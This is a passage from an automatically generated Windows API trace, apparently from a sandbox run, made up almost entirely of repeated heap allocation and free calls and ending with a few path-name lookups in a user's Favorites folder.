returned 0x99c9c68 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.426] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.426] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.427] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.427] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.428] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.429] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.429] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.430] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.430] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.431] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.432] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.432] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.433] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.433] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0096.433] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02828 [0096.433] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.433] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.434] RtlAllocateHeap 